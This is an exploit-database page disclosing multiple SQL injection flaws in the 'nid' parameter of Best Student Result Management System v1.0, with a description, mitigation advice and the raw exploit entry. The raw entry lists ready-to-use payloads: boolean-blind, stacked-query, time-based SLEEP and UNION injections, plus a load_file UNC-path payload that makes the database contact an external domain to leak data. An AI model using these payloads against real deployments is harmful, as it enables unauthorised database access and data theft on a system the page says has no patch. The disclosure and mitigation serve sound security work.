Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Best Student Result Management System v1.0 - Multiple SQL Injection Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
Best Student Result Management System
by:
nu11secur1ty
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Best Student Result Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:mayurik:best_student_result_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2024

Best Student Result Management System v1.0 – Multiple SQL Injection Vulnerabilities

The 'nid' parameter in Best Student Result Management System v1.0 is prone to SQL injection attacks. An attacker can exploit this vulnerability to execute arbitrary SQL queries on the underlying database. By injecting a malicious payload that calls MySQL's load_file function with a UNC file path pointing to an external domain, the attacker can interact with the external domain and extract sensitive information from the system.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent the execution of arbitrary SQL commands. Additionally, the principle of least privilege should be followed to restrict database permissions.
Source

Exploit-DB raw data:

## Title: Best Student Result Management System v1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 04/08/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The nid parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'
was submitted in the nid parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.
The attacker can get all information from the system by using this
vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM
(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT
NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#
---
```

Navigation

Suggest Exploit

Services By CQR